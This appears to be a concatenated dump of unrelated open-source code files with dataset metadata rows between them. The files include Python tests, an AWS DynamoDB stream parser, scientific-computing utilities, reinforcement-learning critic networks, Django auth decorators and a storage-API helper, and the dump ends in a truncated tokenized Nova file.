weedcoco_path=BASIC_INPUT_PATH, thumbnail_dir=THUMBNAIL_DIR
)
for entry in indexer.generate_index_entries():
assert isinstance(entry["task_type"], list)
# TODO: test the task type for different input annotation data
# TODO: test for "segmentation": []
pytest.xfail("Not yet implemented")
def test_annotation_and_category():
"Check annotations and categories are correctly indexed with each image"
indexer = ElasticSearchIndexer(
weedcoco_path=BASIC_INPUT_PATH, thumbnail_dir=THUMBNAIL_DIR
)
expected_names = {
0: {"name": "crop: daucus carota", "taxo_names": {"crop: daucus carota"}},
1: {"name": "weed: UNSPECIFIED", "taxo_names": {"weed: UNSPECIFIED", "weed"}},
2: {
"name": "weed: sonchus oleraceus",
"taxo_names": {
"weed: sonchus oleraceus",
"weed: non-poaceae",
"weed: asteraceae",
"weed",
},
},
3: {
"name": "weed: lolium perenne",
"taxo_names": {"weed: lolium perenne", "weed: poaceae", "weed"},
},
}
for entry in indexer.generate_index_entries():
assert entry["annotations"] # TODO: check correct number of annotations
for annotation in entry["annotations"]:
category_id = annotation["category_id"]
assert annotation["category"]["name"] == expected_names[category_id]["name"]
assert (
set(annotation["category"]["taxo_names"])
== expected_names[category_id]["taxo_names"]
)
def test_growth_range():
indexer = ElasticSearchIndexer(
weedcoco_path=BASIC_INPUT_PATH, thumbnail_dir=THUMBNAIL_DIR
)
for entry in indexer.generate_index_entries():
growth_range = entry["agcontext"]["bbch_growth_range"]
assert growth_range == {"min": 10, "max": 20}
growth_stage_texts = entry["agcontext"]["growth_stage_texts"]
assert len(growth_stage_texts) == 2
assert entry["agcontext"]["growth_stage_min_text"] in growth_stage_texts
assert entry["agcontext"]["growth_stage_max_text"] in growth_stage_texts
assert (
entry["agcontext"]["growth_stage_max_text"]
!= entry["agcontext"]["growth_stage_min_text"]
)
# TODO: test remove_other_versions
| 31.636364 | 88 | 0.620051 |
165919830f020d83e9ad652431ad1033d8356db4 | 2,487 | py | Python | lambdAWS/record.py | wesky93/lambdAWS | 6ffa45f09284d07c02a2ce47a0665efa2c6b051a | [
"MIT"
] | null | null | null | lambdAWS/record.py | wesky93/lambdAWS | 6ffa45f09284d07c02a2ce47a0665efa2c6b051a | [
"MIT"
] | null | null | null | lambdAWS/record.py | wesky93/lambdAWS | 6ffa45f09284d07c02a2ce47a0665efa2c6b051a | [
"MIT"
] | null | null | null | from boto3.dynamodb.types import TypeDeserializer
class Record :
def __init__( self, raw_record ) :
self.raw = raw_record
self.resource = self.raw[ 'eventSource' ][ 4 : ]
self.region = self.raw[ 'awsRegion' ]
self.eventID = self.raw[ 'eventID' ]
try :
self.eventName = self.raw[ 'eventName' ]
except KeyError :
pass
self.get_item()
def get_item( self ) :
"""
이 메소드를 오버라이드하여 각 리소스에 맞는 정보를 추출한다
:return:
"""
pass
# DynamoDB Stream Event
class DDBStream( Record ) :
"""
DynamoDB Stream Event를 통해 들어온 정보를 파이썬으로 직졀화합니다.
Stream Event중 KEYS_ONLY,OLD_IMAGE,NewImage 이 3가지는 필드명으로 메소드 접근이 가능하다.
ex) abc라는 필드 명이 있을 경우 DDBStream().abc 로 필드 값을 확인 가능함
다만 NEW_AND_OLD_IMAGES일 경우 이전 값과 새로운 값을 모두 받아 들이기에
이전값을 self._old에 딕셔너리 형태로 저장함
"""
def get_item( self ) :
def deserialize( value ) :
"""
            Deserialize a single attribute value using boto3.dynamodb.types.TypeDeserializer.
:param value: ddb field dict, ex) {"S":"foobar"}
:return:
"""
return TypeDeserializer().deserialize( value )
def get_attribute( dic: dict ) :
"""
            Deserialize a DynamoDB-typed dict into a plain Python dictionary.
:param dic:
:return:
"""
attr = dic
item = { }
for key, value in attr.items() :
                item[ key ] = deserialize( value )  # key the result by the attribute name
return item
raw = self.raw[ 'dynamodb' ]
        # deserialize the key attributes
keys = get_attribute( raw[ 'Keys' ] )
self.__dict__.update( keys )
        # branch on the stream view type
streamType = raw[ 'StreamViewType' ]
if streamType == 'KEYS_ONLY' :
pass
elif streamType == 'NEW_IMAGE' :
new = get_attribute( raw[ 'NewImage' ] )
self.__dict__.update( new )
elif streamType == 'OLD_IMAGE' :
old = get_attribute( raw[ 'OldImage' ] )
self.__dict__.update( old )
elif streamType == 'NEW_AND_OLD_IMAGES' :
new = get_attribute( raw[ 'NewImage' ] )
old = get_attribute( raw[ 'OldImage' ] )
self.__dict__.update( new )
self.__dict__.update( { '_old' : old } )
else :
raise KeyError
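    # A minimal usage sketch (illustrative only; assumes a Lambda handler that
    # receives a DynamoDB Streams event dict named `event`):
    #
    #   for raw_record in event[ 'Records' ] :
    #       record = DDBStream( raw_record )
    #       print( record.eventName, record.__dict__ )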
# S3 Event
class S3( Record ) :
pass
# Sns Event
class Sns( Record ) :
pass
# S3 -> Sns Event
class S3Sns( Record ) :
pass
| 26.178947 | 73 | 0.527543 |
74e12a3e592fa92d61391f88fc3f0a4f24806610 | 2,661 | py | Python | applications/SwimmingDEMApplication/python_scripts/L2_error_calculator_utility.py | clazaro/Kratos | b947b82c90dfcbf13d60511427f85990d36b90be | [
"BSD-4-Clause"
] | 778 | 2017-01-27T16:29:17.000Z | 2022-03-30T03:01:51.000Z | applications/SwimmingDEMApplication/python_scripts/L2_error_calculator_utility.py | clazaro/Kratos | b947b82c90dfcbf13d60511427f85990d36b90be | [
"BSD-4-Clause"
] | 6,634 | 2017-01-15T22:56:13.000Z | 2022-03-31T15:03:36.000Z | applications/SwimmingDEMApplication/python_scripts/L2_error_calculator_utility.py | clazaro/Kratos | b947b82c90dfcbf13d60511427f85990d36b90be | [
"BSD-4-Clause"
] | 224 | 2017-02-07T14:12:49.000Z | 2022-03-06T23:09:34.000Z | from __future__ import print_function, absolute_import, division # makes KratosMultiphysics backward compatible with python 2.6 and 2.7
# importing the Kratos Library
import KratosMultiphysics
from KratosMultiphysics import Vector
import KratosMultiphysics.SwimmingDEMApplication as SDEM
import sys
class L2ErrorCalculatorUtility:
def __init__(self, model, parameters):
"""The default constructor of the class.
Keyword arguments:
self -- It signifies an instance of a class.
        model -- the container of the different model parts.
        parameters -- the Kratos project parameters holding the benchmark settings.
"""
self.model_part = model
self.u_characteristic = parameters["fluid_parameters"]["processes"]["initial_conditions_process_list"][0]["Parameters"]["benchmark_parameters"]["u_char"].GetDouble()
for element in self.model_part.Elements:
rho = element.Properties.GetValue(KratosMultiphysics.DENSITY)
break
self.p_characteristic = (1/2)*rho*self.u_characteristic**2
self.model = KratosMultiphysics.Model()
self.element_name = "Element3D4N"
self.error_model_part = self.model.CreateModelPart("ErrorModelPart")
self.error_model_part.AddNodalSolutionStepVariable(SDEM.VECTORIAL_ERROR)
self.error_model_part.AddNodalSolutionStepVariable(SDEM.SCALAR_ERROR)
self.error_model_part.AddNodalSolutionStepVariable(SDEM.ERROR_X)
self.error_model_part.AddNodalSolutionStepVariable(SDEM.ERROR_Y)
self.error_model_part.AddNodalSolutionStepVariable(SDEM.ERROR_Z)
self.error_model_part.AddNodalSolutionStepVariable(SDEM.ERROR_P)
model_part_cloner = KratosMultiphysics.ConnectivityPreserveModeler()
model_part_cloner.GenerateModelPart(self.model_part, self.error_model_part, self.element_name)
self.error_model_part.ProcessInfo = self.model_part.ProcessInfo
def CalculateL2(self):
self.ComputeDofsErrors(self.error_model_part)
self.velocity_error_norm = self.VectorL2ErrorNorm(self.error_model_part)
self.pressure_error_norm = self.ScalarL2ErrorNorm(self.error_model_part)
return self.velocity_error_norm/self.u_characteristic, self.pressure_error_norm/self.p_characteristic, self.error_model_part
def ComputeDofsErrors(self, error_model_part):
SDEM.L2ErrorNormCalculator().ComputeDofsErrors(self.error_model_part)
def VectorL2ErrorNorm(self, error_model_part):
return SDEM.L2ErrorNormCalculator().GetL2VectorErrorNorm(self.error_model_part)
def ScalarL2ErrorNorm(self, error_model_part):
return SDEM.L2ErrorNormCalculator().GetL2ScalarErrorNorm(self.error_model_part)
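# A minimal usage sketch (illustrative only; `fluid_model_part` and `project_parameters`
# stand for the objects provided by the enclosing SwimmingDEM analysis):
#
#   error_utility = L2ErrorCalculatorUtility(fluid_model_part, project_parameters)
#   velocity_error, pressure_error, error_model_part = error_utility.CalculateL2()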
| 44.35 | 173 | 0.765502 |
effee3954185be2bc93f6a770225811ef82f0091 | 227 | py | Python | src/python/Sailing/src/sailing/core/sailor.py | emop/task-worker | c97cd432d46c73e3e0908d55e7cd10de0afc0854 | [
"BSD-2-Clause"
] | 1 | 2021-09-01T09:54:38.000Z | 2021-09-01T09:54:38.000Z | src/python/Sailing/src/sailing/core/sailor.py | emop/task-worker | c97cd432d46c73e3e0908d55e7cd10de0afc0854 | [
"BSD-2-Clause"
] | null | null | null | src/python/Sailing/src/sailing/core/sailor.py | emop/task-worker | c97cd432d46c73e3e0908d55e7cd10de0afc0854 | [
"BSD-2-Clause"
] | 1 | 2015-09-19T05:25:31.000Z | 2015-09-19T05:25:31.000Z |
class Sailor(object):
def ready(self):
pass
def idle(self):
pass
def start(self, task):
pass
def waiting(self):
pass
def shutdown(self):
pass | 13.352941 | 26 | 0.462555 |
49f08b393d07917b325ed43a2090356fef9e896d | 1,619 | py | Python | tests/unit_tests/periodic/test_aggregate_and_send_metrics.py | briandcho/unleash-client-python | ce7f69028265fd7aae774aa41144b4f5e078c91d | [
"MIT"
] | null | null | null | tests/unit_tests/periodic/test_aggregate_and_send_metrics.py | briandcho/unleash-client-python | ce7f69028265fd7aae774aa41144b4f5e078c91d | [
"MIT"
] | null | null | null | tests/unit_tests/periodic/test_aggregate_and_send_metrics.py | briandcho/unleash-client-python | ce7f69028265fd7aae774aa41144b4f5e078c91d | [
"MIT"
] | null | null | null | import json
from datetime import datetime, timezone, timedelta
import responses
from fcache.cache import FileCache
from tests.utilities.testing_constants import URL, APP_NAME, INSTANCE_ID, CUSTOM_HEADERS, IP_LIST
from UnleashClient.constants import METRICS_URL, METRIC_LAST_SENT_TIME
from UnleashClient.periodic_tasks import aggregate_and_send_metrics
from UnleashClient.features import Feature
from UnleashClient.strategies import RemoteAddress, Default
FULL_METRICS_URL = URL + METRICS_URL
print(FULL_METRICS_URL)
@responses.activate
def test_aggregate_and_send_metrics():
responses.add(responses.POST, FULL_METRICS_URL, json={}, status=200)
start_time = datetime.now(timezone.utc) - timedelta(seconds=60)
cache = FileCache("TestCache")
cache[METRIC_LAST_SENT_TIME] = start_time
strategies = [RemoteAddress(parameters={"IPs": IP_LIST}), Default()]
my_feature1 = Feature("My Feature1", True, strategies)
my_feature1.yes_count = 1
my_feature1.no_count = 1
my_feature2 = Feature("My Feature2", True, strategies)
my_feature2.yes_count = 2
my_feature2.no_count = 2
features = {"My Feature1": my_feature1, "My Feature 2": my_feature2}
aggregate_and_send_metrics(URL, APP_NAME, INSTANCE_ID, CUSTOM_HEADERS, features, cache)
assert len(responses.calls) == 1
request = json.loads(responses.calls[0].request.body)
assert len(request['bucket']["toggles"].keys()) == 2
assert request['bucket']["toggles"]["My Feature1"]["yes"] == 1
assert request['bucket']["toggles"]["My Feature1"]["no"] == 1
assert cache[METRIC_LAST_SENT_TIME] > start_time
| 37.651163 | 97 | 0.757875 |
72a910cc223e73a2840a87860bc942dd1ca5c0e4 | 14,681 | py | Python | alf/networks/critic_networks.py | breakds/alf | b3d60048daee2c9625ba44f778e49570d0d029a7 | [
"Apache-2.0"
] | 1 | 2021-11-17T17:08:04.000Z | 2021-11-17T17:08:04.000Z | alf/networks/critic_networks.py | ipsec/alf | 15fd71896eac5ad0987dbe14a9f630b32e0e131f | [
"Apache-2.0"
] | null | null | null | alf/networks/critic_networks.py | ipsec/alf | 15fd71896eac5ad0987dbe14a9f630b32e0e131f | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020 Horizon Robotics and ALF Contributors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""CriticNetworks"""
import functools
import math
import torch
import alf
import alf.utils.math_ops as math_ops
import alf.nest as nest
from alf.initializers import variance_scaling_init
from alf.tensor_specs import TensorSpec
from .encoding_networks import EncodingNetwork, LSTMEncodingNetwork, ParallelEncodingNetwork
def _check_action_specs_for_critic_networks(
action_spec, action_input_processors, action_preprocessing_combiner):
if len(nest.flatten(action_spec)) > 1:
assert action_preprocessing_combiner is not None, (
"An action combiner is needed when there are multiple action specs:"
" {}".format(action_spec))
def _check_individual(spec, proc):
if spec.is_discrete:
assert proc is not None, (
'CriticNetwork only supports continuous actions. One of given '
+ 'action specs {} is discrete. Use QNetwork instead. '.format(
spec) +
'Alternatively, specify `action_input_processors` to transform '
+ 'discrete actions to continuous action embeddings first.')
if action_input_processors is None:
action_input_processors = nest.map_structure(lambda _: None,
action_spec)
nest.map_structure(_check_individual, action_spec, action_input_processors)
@alf.configurable
class CriticNetwork(EncodingNetwork):
"""Creates an instance of ``CriticNetwork`` for estimating action-value of
continuous or discrete actions. The action-value is defined as the expected
return starting from the given input observation and taking the given action.
    This module takes an observation and an action as input and outputs an
    action-value tensor with the shape of ``[batch_size]``.
    The network takes a tuple of (observation, action) as input to compute the
    action-value given an observation.
"""
def __init__(self,
input_tensor_spec,
output_tensor_spec=TensorSpec(()),
observation_input_processors=None,
observation_preprocessing_combiner=None,
observation_conv_layer_params=None,
observation_fc_layer_params=None,
action_input_processors=None,
action_preprocessing_combiner=None,
action_fc_layer_params=None,
observation_action_combiner=None,
joint_fc_layer_params=None,
activation=torch.relu_,
kernel_initializer=None,
use_fc_bn=False,
use_naive_parallel_network=False,
name="CriticNetwork"):
"""
Args:
input_tensor_spec: A tuple of ``TensorSpec``s ``(observation_spec, action_spec)``
representing the inputs.
output_tensor_spec (TensorSpec): spec for the output
observation_input_preprocessors (nested Network|nn.Module|None): a nest of
input preprocessors, each of which will be applied to the
corresponding observation input.
observation_preprocessing_combiner (NestCombiner): preprocessing called
on complex observation inputs.
observation_conv_layer_params (tuple[tuple]): a tuple of tuples where each
tuple takes a format ``(filters, kernel_size, strides, padding)``,
where ``padding`` is optional.
observation_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layer sizes for observations.
action_input_processors (nested Network|nn.Module|None): a nest of
input preprocessors, each of which will be applied to the
corresponding action input.
action_preprocessing_combiner (NestCombiner): preprocessing called
to combine complex action inputs.
action_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layer sizes for actions.
observation_action_combiner (NestCombiner): combiner class for fusing
the observation and action. If None, ``NestConcat`` will be used.
joint_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layer sizes FC layers after merging observations and
actions.
activation (nn.functional): activation used for hidden layers. The
last layer will not be activated.
kernel_initializer (Callable): initializer for all the layers but
the last layer. If none is provided a variance_scaling_initializer
with uniform distribution will be used.
            use_fc_bn (bool): whether to use Batch Normalization for the internal
FC layers (i.e. FC layers beside the last one).
use_naive_parallel_network (bool): if True, will use
``NaiveParallelNetwork`` when ``make_parallel`` is called. This
might be useful in cases when the ``NaiveParallelNetwork``
                has an advantage in terms of speed over ``ParallelNetwork``.
You have to test to see which way is faster for your particular
situation.
name (str):
"""
if kernel_initializer is None:
kernel_initializer = functools.partial(
variance_scaling_init,
gain=math.sqrt(1.0 / 3),
mode='fan_in',
distribution='uniform')
observation_spec, action_spec = input_tensor_spec
obs_encoder = EncodingNetwork(
observation_spec,
input_preprocessors=observation_input_processors,
preprocessing_combiner=observation_preprocessing_combiner,
conv_layer_params=observation_conv_layer_params,
fc_layer_params=observation_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer,
use_fc_bn=use_fc_bn,
name=name + ".obs_encoder")
_check_action_specs_for_critic_networks(action_spec,
action_input_processors,
action_preprocessing_combiner)
action_encoder = EncodingNetwork(
action_spec,
input_preprocessors=action_input_processors,
preprocessing_combiner=action_preprocessing_combiner,
fc_layer_params=action_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer,
use_fc_bn=use_fc_bn,
name=name + ".action_encoder")
last_kernel_initializer = functools.partial(
torch.nn.init.uniform_, a=-0.003, b=0.003)
if observation_action_combiner is None:
observation_action_combiner = alf.layers.NestConcat(dim=-1)
super().__init__(
input_tensor_spec=input_tensor_spec,
output_tensor_spec=output_tensor_spec,
input_preprocessors=(obs_encoder, action_encoder),
preprocessing_combiner=observation_action_combiner,
fc_layer_params=joint_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer,
last_layer_size=output_tensor_spec.numel,
last_activation=math_ops.identity,
use_fc_bn=use_fc_bn,
last_kernel_initializer=last_kernel_initializer,
name=name)
self._use_naive_parallel_network = use_naive_parallel_network
def make_parallel(self, n):
"""Create a parallel critic network using ``n`` replicas of ``self``.
The initialized network parameters will be different.
If ``use_naive_parallel_network`` is True, use ``NaiveParallelNetwork``
to create the parallel network.
"""
if self._use_naive_parallel_network:
return alf.networks.NaiveParallelNetwork(self, n)
else:
return super().make_parallel(n, True)
@alf.configurable
class CriticRNNNetwork(LSTMEncodingNetwork):
"""Creates an instance of ``CriticRNNNetwork`` for estimating action-value
of continuous or discrete actions. The action-value is defined as the
expected return starting from the given inputs (observation and state) and
taking the given action. It takes observation and state as input and outputs
an action-value tensor with the shape of [batch_size].
"""
def __init__(self,
input_tensor_spec,
output_tensor_spec=TensorSpec(()),
observation_input_processors=None,
observation_preprocessing_combiner=None,
observation_conv_layer_params=None,
observation_fc_layer_params=None,
action_input_processors=None,
action_preprocessing_combiner=None,
action_fc_layer_params=None,
joint_fc_layer_params=None,
lstm_hidden_size=100,
critic_fc_layer_params=None,
activation=torch.relu_,
kernel_initializer=None,
name="CriticRNNNetwork"):
"""
Args:
input_tensor_spec: A tuple of ``TensorSpec``s ``(observation_spec, action_spec)``
representing the inputs.
            output_tensor_spec (TensorSpec): spec for the output
observation_input_preprocessors (nested Network|nn.Module|None): a nest of
input preprocessors, each of which will be applied to the
corresponding observation input.
observation_preprocessing_combiner (NestCombiner): preprocessing called
on complex observation inputs.
observation_conv_layer_params (tuple[tuple]): a tuple of tuples where each
tuple takes a format ``(filters, kernel_size, strides, padding)``,
where ``padding`` is optional.
observation_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layer sizes for observations.
action_input_processors (nested Network|nn.Module|None): a nest of
input preprocessors, each of which will be applied to the
                corresponding action input.
action_preprocessing_combiner (NestCombiner): preprocessing called
to combine complex action inputs.
action_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layer sizes for actions.
joint_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layer sizes FC layers after merging observations and
actions.
lstm_hidden_size (int or tuple[int]): the hidden size(s)
of the LSTM cell(s). Each size corresponds to a cell. If there
are multiple sizes, then lstm cells are stacked.
critic_fc_layer_params (tuple[int]): a tuple of integers representing
hidden FC layers that are applied after the lstm cell's output.
activation (nn.functional): activation used for hidden layers. The
last layer will not be activated.
kernel_initializer (Callable): initializer for all the layers but
the last layer. If none is provided a ``variance_scaling_initializer``
with uniform distribution will be used.
name (str):
"""
if kernel_initializer is None:
kernel_initializer = functools.partial(
variance_scaling_init,
gain=math.sqrt(1.0 / 3),
mode='fan_in',
distribution='uniform')
observation_spec, action_spec = input_tensor_spec
obs_encoder = EncodingNetwork(
observation_spec,
input_preprocessors=observation_input_processors,
preprocessing_combiner=observation_preprocessing_combiner,
conv_layer_params=observation_conv_layer_params,
fc_layer_params=observation_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer)
_check_action_specs_for_critic_networks(action_spec,
action_input_processors,
action_preprocessing_combiner)
action_encoder = EncodingNetwork(
action_spec,
input_preprocessors=action_input_processors,
preprocessing_combiner=action_preprocessing_combiner,
fc_layer_params=action_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer)
last_kernel_initializer = functools.partial(
torch.nn.init.uniform_, a=-0.003, b=0.003)
super().__init__(
input_tensor_spec=input_tensor_spec,
output_tensor_spec=output_tensor_spec,
input_preprocessors=(obs_encoder, action_encoder),
preprocessing_combiner=alf.layers.NestConcat(dim=-1),
pre_fc_layer_params=joint_fc_layer_params,
hidden_size=lstm_hidden_size,
post_fc_layer_params=critic_fc_layer_params,
activation=activation,
kernel_initializer=kernel_initializer,
last_layer_size=output_tensor_spec.numel,
last_activation=math_ops.identity,
last_kernel_initializer=last_kernel_initializer)
def make_parallel(self, n):
"""Create a parallel critic RNN network using ``n`` replicas of ``self``.
The initialized network parameters will be different.
If ``use_naive_parallel_network`` is True, use ``NaiveParallelNetwork``
to create the parallel network.
"""
return super().make_parallel(n, True)
| 47.665584 | 93 | 0.649683 |
e728b3a6504e94174778e77912866b7cd8da6690 | 3,759 | py | Python | cinder/volume/drivers/coprhd/helpers/host.py | bswartz/cinder | 6cfecade9e2ee86bbb7d95c3c401c9e4c70f6a96 | [
"Apache-2.0"
] | null | null | null | cinder/volume/drivers/coprhd/helpers/host.py | bswartz/cinder | 6cfecade9e2ee86bbb7d95c3c401c9e4c70f6a96 | [
"Apache-2.0"
] | null | null | null | cinder/volume/drivers/coprhd/helpers/host.py | bswartz/cinder | 6cfecade9e2ee86bbb7d95c3c401c9e4c70f6a96 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2016 EMC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinder.i18n import _
from cinder.volume.drivers.coprhd.helpers import commoncoprhdapi as common
from cinder.volume.drivers.coprhd.helpers import tenant
class Host(common.CoprHDResource):
# All URIs for the Host operations
URI_HOST_DETAILS = "/compute/hosts/{0}"
URI_HOST_LIST_INITIATORS = "/compute/hosts/{0}/initiators"
URI_COMPUTE_HOST = "/compute/hosts"
URI_HOSTS_SEARCH_BY_NAME = "/compute/hosts/search?name={0}"
def query_by_name(self, host_name, tenant_name=None):
"""Search host matching host_name and tenant if tenant_name provided.
tenant_name is optional
"""
hostList = self.list_all(tenant_name)
for host in hostList:
hostUri = host['id']
hostDetails = self.show_by_uri(hostUri)
if hostDetails:
if hostDetails['name'] == host_name:
return hostUri
raise common.CoprHdError(common.CoprHdError.NOT_FOUND_ERR, (_(
"Host with name: %s not found") % host_name))
def list_initiators(self, host_name):
"""Lists all initiators for the given host.
:param host_name: The name of the host
"""
if not common.is_uri(host_name):
hostUri = self.query_by_name(host_name, None)
else:
hostUri = host_name
(s, h) = common.service_json_request(
self.ipaddr, self.port, "GET",
Host.URI_HOST_LIST_INITIATORS.format(hostUri),
None)
o = common.json_decode(s)
if not o or "initiator" not in o:
return []
return common.get_node_value(o, 'initiator')
def list_all(self, tenant_name):
"""Gets the ids and self links for all compute elements."""
restapi = self.URI_COMPUTE_HOST
tenant_obj = tenant.Tenant(self.ipaddr, self.port)
if tenant_name is None:
tenant_uri = tenant_obj.tenant_getid()
else:
tenant_uri = tenant_obj.tenant_query(tenant_name)
restapi = restapi + "?tenant=" + tenant_uri
(s, h) = common.service_json_request(
self.ipaddr, self.port,
"GET",
restapi,
None)
o = common.json_decode(s)
return o['host']
def show_by_uri(self, uri):
"""Makes REST API call to retrieve Host details based on its UUID."""
(s, h) = common.service_json_request(self.ipaddr, self.port, "GET",
Host.URI_HOST_DETAILS.format(uri),
None)
o = common.json_decode(s)
inactive = common.get_node_value(o, 'inactive')
if inactive:
return None
return o
def search_by_name(self, host_name):
"""Search host by its name."""
(s, h) = common.service_json_request(
self.ipaddr, self.port, "GET",
self.URI_HOSTS_SEARCH_BY_NAME.format(host_name), None)
o = common.json_decode(s)
if not o:
return []
return common.get_node_value(o, "resource")
| 35.8 | 79 | 0.614525 |
37b907907f050194f31587b8b969113a63c9a5a1 | 3,049 | py | Python | python3.4Smartforest/lib/python3.4/site-packages/django/contrib/auth/decorators.py | letouriste001/SmartForest_2.0 | 109b78bf1e8c8404800f377ab969395ccbb617be | [
"MIT"
] | null | null | null | python3.4Smartforest/lib/python3.4/site-packages/django/contrib/auth/decorators.py | letouriste001/SmartForest_2.0 | 109b78bf1e8c8404800f377ab969395ccbb617be | [
"MIT"
] | null | null | null | python3.4Smartforest/lib/python3.4/site-packages/django/contrib/auth/decorators.py | letouriste001/SmartForest_2.0 | 109b78bf1e8c8404800f377ab969395ccbb617be | [
"MIT"
] | null | null | null | from functools import wraps
from django.conf import settings
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.core.exceptions import PermissionDenied
from django.shortcuts import resolve_url
from django.utils import six
from django.utils.decorators import available_attrs
from django.utils.six.moves.urllib.parse import urlparse
def user_passes_test(test_func, login_url=None, redirect_field_name=REDIRECT_FIELD_NAME):
"""
Decorator for views that checks that the user passes the given test,
redirecting to the log-in page if necessary. The test should be a callable
that takes the user object and returns True if the user passes.
"""
def decorator(view_func):
@wraps(view_func, assigned=available_attrs(view_func))
def _wrapped_view(request, *args, **kwargs):
if test_func(request.user):
return view_func(request, *args, **kwargs)
path = request.build_absolute_uri()
resolved_login_url = resolve_url(login_url or settings.LOGIN_URL)
# If the login url is the same scheme and net location then just
# use the path as the "next" url.
login_scheme, login_netloc = urlparse(resolved_login_url)[:2]
current_scheme, current_netloc = urlparse(path)[:2]
if ((not login_scheme or login_scheme == current_scheme) and
(not login_netloc or login_netloc == current_netloc)):
path = request.get_full_path()
from django.contrib.auth.views import redirect_to_login
return redirect_to_login(
path, resolved_login_url, redirect_field_name)
return _wrapped_view
return decorator
def login_required(function=None, redirect_field_name=REDIRECT_FIELD_NAME, login_url=None):
"""
Decorator for views that checks that the user is logged in, redirecting
to the log-in page if necessary.
"""
actual_decorator = user_passes_test(
lambda u: u.is_authenticated(),
login_url=login_url,
redirect_field_name=redirect_field_name
)
if function:
return actual_decorator(function)
return actual_decorator
def permission_required(perm, login_url=None, raise_exception=False):
"""
Decorator for views that checks whether a user has a particular permission
enabled, redirecting to the log-in page if necessary.
If the raise_exception parameter is given the PermissionDenied exception
is raised.
"""
def check_perms(user):
if isinstance(perm, six.string_types):
perms = (perm, )
else:
perms = perm
# First check if the user has the permission (even anon users)
if user.has_perms(perms):
return True
# In case the 403 handler should be called raise the exception
if raise_exception:
raise PermissionDenied
# As the last resort, show the login form
return False
return user_passes_test(check_perms, login_url=login_url)
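# Typical usage of these decorators on view functions (illustrative view names only):
#
#   @login_required
#   def my_view(request):
#       ...
#
#   @permission_required('polls.can_vote', raise_exception=True)
#   def vote_view(request):
#       ...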
| 3,049 | 3,049 | 0.69367 |
526d893526ca89ba0d96a81e9d02698c714cfff2 | 1,170 | py | Python | tests/storage/cases/test_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon.py | juztin/pytezos-1 | 7e608ff599d934bdcf129e47db43dbdb8fef9027 | [
"MIT"
] | 1 | 2020-08-11T02:31:24.000Z | 2020-08-11T02:31:24.000Z | tests/storage/cases/test_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon.py | juztin/pytezos-1 | 7e608ff599d934bdcf129e47db43dbdb8fef9027 | [
"MIT"
] | 1 | 2020-12-30T16:44:56.000Z | 2020-12-30T16:44:56.000Z | tests/storage/cases/test_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon.py | tqtezos/pytezos | a4ac0b022d35d4c9f3062609d8ce09d584b5faa8 | [
"MIT"
] | 1 | 2022-03-20T19:01:00.000Z | 2022-03-20T19:01:00.000Z | from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/mainnet/KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon.json')
def test_storage_encoding_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1VvXEpeBpreAVpfp4V8ZujqWu2gVykwXBJ_babylon(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
| 41.785714 | 112 | 0.757265 |
de4a6e8103e176d0d6d39a6a3f3056286fa6720f | 6,287 | py | Python | nova/scheduler/weights/affinity.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/scheduler/weights/affinity.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/scheduler/weights/affinity.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | 2 | 2017-07-20T17:31:34.000Z | 2020-07-24T02:42:19.000Z | begin_unit
comment|'# Copyright (c) 2015 Ericsson AB'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
